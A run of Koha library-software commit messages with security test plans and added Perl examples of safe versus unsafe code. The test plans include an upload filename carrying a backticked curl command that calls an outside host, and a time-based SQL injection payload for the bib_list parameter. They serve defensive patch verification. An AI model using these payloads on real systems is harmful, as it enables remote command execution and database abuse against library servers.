Test plan:
Try to access opac-page.pl with a language not in OPACLanguages.
Verify that this 'language' was not passed to sql. Simplest perhaps
by debugging AdditionalContent.pm. Something like:
sub translated_content {
my ( $self, $lang ) = @_;
+warn "L137: $lang";
Now have a public additional_contents page and hit it:
/cgi-bin/koha/opac-page.pl?page_id=5&language=badsql
Check your log and find:
[2024/05/16 07:25:53] [WARN] L137: en at [etc] line 137.
So badsql was caught.
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
To test:
1/ create a file named something like 'execute`curl blog.bigballofwax.co.nz`.zip'
Where the domain is one you can watch the logs from
2/ Upload this file as a cover image
3/ Check /var/lib/koha/sitename/tmp/koha_sitename/ and see unescaped filenames
4/ Choose process, check the logs of the webserver see the connection has been made
5/ Apply the patch
6/ Repeat 2 & 3 and see the filename is now escaped
7/ Choose process and check no errors but no remote execution occurs
8/ Test uploading an actual zip file and images still works
Signed-off-by: Amit Gupta <amit.gupta@informaticsglobal.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
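The test plan above relies on a filename containing backticks being handed to a shell. Below is an added example (not Koha's code) that contrasts the interpolating command string with Perl's list-form system(), which never invokes a shell, and adds a filename sanitiser for the copy written to the temp directory. The upload name is the one from the test plan; the unzip options, the temp directory and the helper names are assumptions for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Basename qw(basename);
use File::Temp qw(tempdir);

# Constructed attacker-controlled upload name, as in the test plan above.
my $uploaded_name = 'execute`curl blog.bigballofwax.co.nz`.zip';

# Reduce the on-disk name to a conservative character set. basename() drops
# any directory part (so "../" cannot escape the temp directory), the
# substitution turns shell metacharacters into "_", and leading "." or "-"
# are removed so the result is neither hidden nor option-like.
sub sanitise_filename {
    my ($name) = @_;
    my $base = basename($name);
    $base =~ s/[^A-Za-z0-9._-]/_/g;
    $base =~ s/^[.-]+//;
    $base = 'upload' if $base eq '';
    return $base;
}

# True when a string contains characters /bin/sh would interpret.
sub has_shell_metachars {
    my ($s) = @_;
    return $s =~ /[`\$&|;<>()\s'"\\*?\[\]{}~!#]/ ? 1 : 0;
}

# UNSAFE: one string, so system("...") hands it to /bin/sh, which runs the
# backticked command before unzip ever sees the name.
sub unzip_command_unsafe {
    my ( $zip, $dest ) = @_;
    return "unzip -o $zip -d $dest";
}

# SAFE: argv list form. Perl's system(LIST) execs the program directly,
# so metacharacters in $zip are just bytes inside one argument.
sub unzip_argv {
    my ( $zip, $dest ) = @_;
    return ( 'unzip', '-o', $zip, '-d', $dest );
}

my $dir  = tempdir( CLEANUP => 1 );    # assumed stand-in for Koha's upload tmp dir
my $safe = sanitise_filename($uploaded_name);

printf "raw name has shell metachars: %d\n", has_shell_metachars($uploaded_name);
printf "stored as: %s (metachars: %d)\n", $safe, has_shell_metachars($safe);
print "unsafe: ", unzip_command_unsafe( "$dir/$uploaded_name", $dir ), "\n";
print "argv:   ", join( ' | ', unzip_argv( "$dir/$safe", $dir ) ), "\n";
# To actually extract a real archive:
# system( unzip_argv("$dir/$safe", $dir) ) == 0 or die "unzip failed: $?";
```

Sanitising the stored name is defence in depth; the property that actually closes the hole is that the program receives its arguments as a list and no shell ever parses them.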
To test
1/ Add some items to your cart in the opac
2/ Choose send cart
3/ Open firefox developer tools and switch to the network tab
4/ Send cart
5/ In the network tab, find the post request and choose copy as curl
6/ Edit the curl command to add )+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+- to the bib_list parameter
7/ Run the curl and notice it takes a long time to respond; if you want to check, run the curl without the above part added
8/ Apply the patch and restart plack
9/ Run the modified curl and notice the slowdown no longer occurs
10/ Test in browser and make sure the basket is still sent
Signed-off-by: Amit Gupta <amit.gupta@informaticsglobal.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Actually in _get_tt_params
The following query will delay the response
SELECT `me`.`biblionumber`, `me`.`frameworkcode`, `me`.`author`, `me`.`title`, `me`.`medium`, `me`.`subtitle`, `me`.`part_number`, `me`.`part_name`, `me`.`unititle`, `me`.`notes`, `me`.`serial`, `me`.`seriestitle`
, `me`.`copyrightdate`, `me`.`timestamp`, `me`.`datecreated`, `me`.`abstract`
FROM `biblio` `me`
WHERE `biblionumber` = '1) AND (SELECT 1 FROM (SELECT(SLEEP(6)))x)-- -'
ORDER BY field( biblionumber, 1 ) AND (
SELECT 1
FROM
SELECT SLEEP( 6 ) x
) -- - )
To test
1/ Add some items to your cart in the opac
2/ Choose send cart
3/ Open firefox developer tools and switch to the network tab
4/ Send cart
5/ In the network tab, find the post request and choose copy as curl
6/ Edit the curl command to add )+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+- to the bib_list parameter
7/ Run the curl and notice it takes a long time to respond; if you want to check, run the curl without the above part added
8/ Apply the patch and restart plack
9/ Run the modified curl and notice the slowdown no longer occurs
10/ Test in browser and make sure the basket is still sent
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
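The query shown above is what happens when bib_list is interpolated into ORDER BY FIELD(): the WHERE side is quoted and survives, the FIELD() argument list is not and becomes the attacker's expression. The added example below (not Koha's code) covers both this and the opac-page.pl language check from the first test plan on this page: validate the list as positive integers, bind one placeholder per id, and resolve the language against the OPACLanguages allowlist. It assumes bib_list is a '/'-separated string and uses a constructed preference value; the payload string is the one from the test plan.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Constructed inputs: the payload from the test plan above and a clean list.
# Assumption: bib_list is a '/'-separated string of biblionumbers.
my $payload = '1) AND (SELECT 1 FROM (SELECT(SLEEP(6)))x)-- -';
my $clean   = '1/5/23';

# Accept only positive integers; a single bad token rejects the whole list.
# Returns an array ref, or nothing (undef in scalar context) on rejection.
sub parse_bib_list {
    my ($bib_list) = @_;
    return [] unless defined $bib_list && length $bib_list;
    my @ids;
    for my $token ( split m{/}, $bib_list ) {
        return unless $token =~ /\A[1-9][0-9]*\z/;
        push @ids, 0 + $token;
    }
    return \@ids;
}

# UNSAFE: the ids are interpolated into the SQL text. With the payload the
# FIELD() argument list becomes the attacker's expression, which is what the
# SLEEP(6) delay in the test plan demonstrates.
sub order_sql_unsafe {
    my ($bib_list) = @_;
    my $csv = join ',', split m{/}, $bib_list;
    return "SELECT biblionumber, title FROM biblio WHERE biblionumber IN ($csv) "
         . "ORDER BY FIELD(biblionumber, $csv)";
}

# SAFE: one placeholder per validated id, passed as bind values. The SQL
# text depends only on how many ids there are, never on their content.
sub order_sql_safe {
    my ($ids) = @_;
    die "empty bib_list" unless @{$ids};
    my $ph  = join ',', ('?') x @{$ids};
    my $sql = "SELECT biblionumber, title FROM biblio WHERE biblionumber IN ($ph) "
            . "ORDER BY FIELD(biblionumber, $ph)";
    return ( $sql, @{$ids}, @{$ids} );
}

# Same idea for the opac-page.pl language parameter: match against the
# OPACLanguages allowlist and fall back; the raw value is never passed on.
# Constructed stand-in for the system preference value.
my $OPACLanguages = 'en,fr-FR,de-DE';

sub resolve_language {
    my ( $requested, $allowed_csv, $fallback ) = @_;
    my %allowed = map { $_ => 1 } grep { length } split /\s*,\s*/, $allowed_csv;
    return ( defined $requested && $allowed{$requested} ) ? $requested : $fallback;
}

print "unsafe SQL with payload:\n  ", order_sql_unsafe($payload), "\n\n";

for my $input ( $clean, $payload ) {
    my $ids = parse_bib_list($input);
    if ( !defined $ids ) {
        print "rejected bib_list: $input\n";
        next;
    }
    my ( $sql, @bind ) = order_sql_safe($ids);
    print "safe SQL:\n  $sql\n  bind: @bind\n";
}

for my $lang ( 'en', 'fr-FR', 'badsql', undef ) {
    printf "language %-8s -> %s\n", defined $lang ? $lang : '(none)',
        resolve_language( $lang, $OPACLanguages, 'en' );
}
```

With DBI the safe form is executed as $dbh->selectall_arrayref($sql, {}, @bind); the same placeholder list serves both IN() and FIELD(), so the ids are bound twice in the same order.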
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
This patch refactors checkpw_internal to remove the SQL code, use patron objects, and return the
patron that correctly matches the userid/cardnumber when auth is successful
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
This patch moves some patron fetching code in C4/Auth to use the patron returned from the validation
methods and only try to fetch the patron (to check if locked, update attempts, etc.) if we didn't authenticate
To test:
1 - Set a user to have userid = BANANA password = Password1
2 - Set a user to have cardnumber = BANANA password = Password2
3 - Hit the patron authentication API:
http://localhost:8080/api/v1/auth/password/validation
with data:
{ "identifier": "BANANA", "password":"Password1" }
and:
{ "identifier": "BANANA", "password":"Password2" }
4 - Note you receive the same response for both
5 - Apply patch, restart all
6 - Repeat the API and confirm you get the correct patron for the password submitted
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
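The two commits above deal with one identifier matching two different patrons, one by userid and one by cardnumber. The added example below (not Koha's code) shows the behaviour the test plan checks for: every candidate is tried and the patron whose password verified is the one returned, so "BANANA"/Password1 and "BANANA"/Password2 resolve to different accounts. The patron records are constructed, and the hashing is HMAC-SHA256 with a per-record salt purely to keep the example dependency-free; Koha itself stores bcrypt hashes.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Digest::SHA qw(hmac_sha256_hex);

# Stand-in for password hashing; NOT how Koha hashes passwords (bcrypt).
sub hash_password {
    my ( $salt, $password ) = @_;
    return hmac_sha256_hex( $password, $salt );
}

# Constructed patrons: the same identifier "BANANA" is a userid for one
# and a cardnumber for the other, as in the test plan above.
my @patrons = (
    { borrowernumber => 1, userid => 'BANANA', cardnumber => '0001',   salt => 's1' },
    { borrowernumber => 2, userid => 'henry',  cardnumber => 'BANANA', salt => 's2' },
);
$patrons[0]{password} = hash_password( 's1', 'Password1' );
$patrons[1]{password} = hash_password( 's2', 'Password2' );

# Constant-time comparison so a mismatch does not leak how many leading
# characters agreed.
sub secure_eq {
    my ( $x, $y ) = @_;
    return 0 unless length $x == length $y;
    my $diff = 0;
    $diff |= ord( substr( $x, $_, 1 ) ) ^ ord( substr( $y, $_, 1 ) ) for 0 .. length($x) - 1;
    return $diff == 0;
}

# All patrons the identifier could mean: userid matches first, then
# cardnumber matches. Both kinds may exist at once.
sub candidates_for {
    my ($identifier) = @_;
    return ( ( grep { $_->{userid} eq $identifier } @patrons ),
             ( grep { $_->{cardnumber} eq $identifier } @patrons ) );
}

# Returns the patron whose password verified, or nothing. Because every
# candidate is checked, the result depends on the password presented, and
# any lockout or attempt counter can be applied to exactly that patron.
sub checkpw {
    my ( $identifier, $password ) = @_;
    for my $p ( candidates_for($identifier) ) {
        return $p if secure_eq( hash_password( $p->{salt}, $password ), $p->{password} );
    }
    return;
}

for my $pw ( 'Password1', 'Password2', 'wrong' ) {
    my $p = checkpw( 'BANANA', $pw );
    printf "BANANA / %-9s -> %s\n", $pw,
        $p ? "borrowernumber $p->{borrowernumber}" : 'no match';
}
```

The point the test plan makes is visible in the last loop: the identifier alone is ambiguous, so the patron object that goes on to the caller has to be the one selected by password verification, not the first row a lookup happened to return.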
This test is useless it seems, it is not testing background jobs
behaviour.
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
We usually test if C4::Context->userenv is set, so we need to undef it when
unsetting, not set it to {} (which evaluates as true)
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Same pattern in Koha::Database
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Same pattern, remove dbh stack
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
We are not using it and it's confusing, let's remove the context stack.
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
TODO - better review C4::Auth's changes. Are all the removal of
_new_userenv correct/enough?
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
To test:
1. Go to circ/circulation.pl and check an item out to a patron.
2. Backdate it to sometime in the past using the "Specify due date
(MM/DD/YYYY) : " input
3. A modal appears to "Please confirm checkout". The date is no longer
populated in that field.
4. You must add the date again here.
5. APPLY PATCH
6. Try again and this time the confirmation date should be set
correctly.
7. Follow the test plan from Bug 18885 to make sure on site checkouts
still work correctly.
Signed-off-by: Owen Leonard <oleonard@myacpl.org>
Signed-off-by: Emily Lamancusa <emily.lamancusa@montgomerycountymd.gov>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
We're copying permissions not settings here, so it makes sense to make
that clear in the wording.
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
This patch moves the 'PlaceHoldsOnOrdersFromSuggestions' system preferences
from the Acquisitions->Printing section to the Circulation->Holds Policy section.
To test:
1) Go to Admin->System Preferences and search for 'PlaceHoldsOnOrdersFromSuggestions'
2) Note that it is located in the Acquisitions prefs, under the Printing subheading
3) Apply patch
4) search for the preferences again
5) Note that it is now located in the Circulation preferences under the Holds Policy subheading
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Emily Lamancusa <emily.lamancusa@montgomerycountymd.gov>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
This patch updates the comments of course_items.location and
course_items.enabled to say "reserve" instead of "reseve".
To test in ktd:
- sudo koha-mysql kohadev
- Run: "SHOW CREATE TABLE course_items;"
- Verify the comments of "location" and "enabled" contains
"reseve" instead of "reserve"
- Make a note of the definitions of these two columns
- Run the atomicupdate: "sudo koha-upgrade-schema kohadev"
- Log into the database again and run the same command as above
- Verify the comments now say "reserve" instead of "reseve"
- Make sure the column definitions are otherwise identical to
the ones you saw before the upgrade. Only the spelling of
"reserve" in the comment should be changed.
Signed-off-by: David Nind <david@davidnind.com>
Removed unnecessary line of debug output. 2024-06-10 Magnus Enger
Signed-off-by: Matt Blenkinsop <matt.blenkinsop@ptfs-europe.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Test plan:
1. git grep 'reseve'. Notice there are instances of 'reseve'
2. Apply patch
3. Repeat step 1, there should be no instances of 'reseve'
Sponsored-by: Catalyst IT, New Zealand
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Matt Blenkinsop <matt.blenkinsop@ptfs-europe.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Test plan:
1. git grep -n -E 'barocode|preproccess' to find the files and line # of typos
2. Apply the patch
3. git grep -E 'barocode|proccess'
4. See no results
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Matt Blenkinsop <matt.blenkinsop@ptfs-europe.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
This makes the hint when entering an SMS number on the OPAC messaging
settings page the same as the staff interface hint: "Please enter
numbers only. Prefix the number with + or 00 if including the country
code." For some countries using either +XX or 00XX are accepted,
for example: +49 or 0049.
Test plan:
1. Set the SMSSendDriver system preference to Email
2. View the current hint for entering an SMS number in the staff
interface:
2.1 Go to Patrons > + New patron > Patron.
2.2 Scroll down to the 'Patron messaging preferences' section at the
end of the page.
2.3 Note that the hint is "Please enter numbers only. Prefix the
number with + or 00 if including the country code.".
3. View the current hint for entering an SMS number in the OPAC:
3.1 Go to the OPAC > Your account (log in if required).
3.2 Select the 'Messaging' tab/section.
3.3 Note that the hint is "Please enter numbers only. Prefix the
number with + if including the country code.".
3.4 The difference: "..or 00.." is missing.
4. Apply the patch.
5. Refresh the OPAC messaging page.
6. The hint text for the OPAC is now the same as the staff interface.
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Sam Lau <samalau@gmail.com>
Signed-off-by: Matt Blenkinsop <matt.blenkinsop@ptfs-europe.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
The date field for patron attributes is now repeatable (enhancement made
in Koha 24.05 with bug 32610). This updates the hint text to reflect
the change.
Test plan:
1. Go to add a patron attribute (Administration > Patrons and
circulation > Patron attribute types > + New patron attribute type )
2. Note that the hint for the "Is a date" field says "...Date attributes
cannot be repeatable or linked to an authorised value category.".
3. Apply the patch.
4. Reload the page.
5. Note that the hint now says "...Date attributes are repeatable,
but cannot be linked to an authorised value category."
6. Sign off D:
PA amended: 'are repeatable' -> 'can be repeatable'
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Update the error message for the web installer onboarding
section when creating the Koha administrator patron (where
the card number or username already exists):
- Fix capitalization
- Use the same label in the error message as used in
the form
Error message before: The patron has not been created!
Card number or Userid may already exist.
Error message after: The patron was not created! The
card number or username already exists.
Test plan:
1. Option 1:
1.1 Review the diff for the patch and make sure that
the updated text makes sense.
. Previous text: The patron has not been created!
Card number or Userid may already exist.
. Updated text: The patron was not created! The
card number or username already exists.
OR
2. Option 2:
2.1 Access the database server:
mysql -uroot -ppassword -hkoha-db-1
2.2 Drop the koha_kohadev database:
drop database koha_kohadev;
2.3 Create the database: create database koha_kohadev;
2.4 Add privileges (for a real installation this would
be limited):
grant all on koha_kohadev.* to koha_kohadev;
2.5 Restart everything (there may be some errors listed):
flush_memcached and then restart_all
2.6 Access the web installer: go to 127.0.0.1:8081
2.7 Use the database user name and password: get from
/etc/koha/sites/kohadev/koha-conf.xml
(default: koha_kohadev, password)
2.8 Continue through the installation process until you
reach 'Selecting default settings':
. Make appropriate selections to use all the sample
data options and settings
2.9 For the 'Onboarding' step - Create Koha
administrator patron:
. Surname: Acevedo
. First name: Henry
. Card number: make up a number that doesn't exist in
the sample data, for example: 741852963
. Library: Centerville
. Patron category: Staff
. Username: 23529000035676 (this is an existing
value already in the sample data)
. Password: a valid password, for example:
KohaCon2024
. Confirm password: repeat password used
. Submit
==> Error message before patch: The patron has not
been created! Card number or Userid may
already exist.
2.10 Apply the patch.
2.11 Repeat step 2.9
2.12 The error message is now: The patron was not created!
The card number or username already exists.
3. Sign off.
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
In the Item search the librarian is allowed, in the first step, to define
additional filters like Title, Author, Publisher, Publication date etc.
(in the third fieldset). This works fine but only for one criterion.
If one adds two or more criteria, the filter does not apply at all.
Test plan
=========
1. Make an Item search with the Publisher filter. Put
%University of California% as the value.
You should get 5 rows (with standard ktd test data set), three
from 1982, and two from 1988.
2. Edit search -> add the second criterion: AND Publication date is 1982.
You would expect three rows but you get 900+ rows.
3. Apply the patch; restart_all.
4. Repeat step 2. You should get the expected three rows.
Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Fix a spelling error in the opacreadinghistory system preference
description - 'itms' to 'items'.
Test plan:
1. In the staff interface view the description for the
opacreadinghistory system preferences (Koha administration >
System preferences > search for opacreadinghistory).
2. Note that it reads "Allow patrons to see what itms they have
checked out in the past."
3. Apply the patch.
4. Refresh the page.
5. Note that 'itms' is now spelt correctly as 'items'.
6. Sign off.
Signed-off-by: Laura Escamilla <laura.escamilla@bywatersolutions.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
If you have enabled AutoLocation and have a branch without an IP, this
triggers warnings.
Test plan:
Check logs in this situation with/without this patch by logging out
and in again on staff.
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
This patch updates the vendor details template so that the title tag
correctly reflects whether the user is viewing the vendor or modifying
it.
To test, apply the patch and go to Acquisitions.
- Locate a vendor and view the details (supplier.pl?booksellerid=X)
- The title should read "Vendor X > Acquisitions > Koha"
- Edit the vendor.
- The title should read "Modify vendor X > Acquisitions > Koha"
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
--category-code was not checked in the "at least one filter option"
check but it is clearly a filter option.
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
* Change the SYNOPSIS to better describe the different ways to use the
script
* Only show the SYNOPSIS when options used are wrong (unknown option,
no filter options, or neither -c nor -v)
* Show the options details only with --help
* Clarify the fact that -v is required when -c is not supplied in the
description of both options
* Print a specific error message for the following cases:
* no filters options
* neither -c nor -v was supplied
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
This patch fixes a warning in the unit tests
Test plan:
1) prove t/db_dependent/api/v1/password_validation.t
2) There will be a warning in the output - 'Use of uninitialized value $status in numeric eq (==)'
3) Apply patch
4) Re-run the test
5) The warning will disappear
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Some actions such as archiving a suggestion were not being logged.
By moving the logging to Koha::Suggestion we can ensure more
modifications will be logged.
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>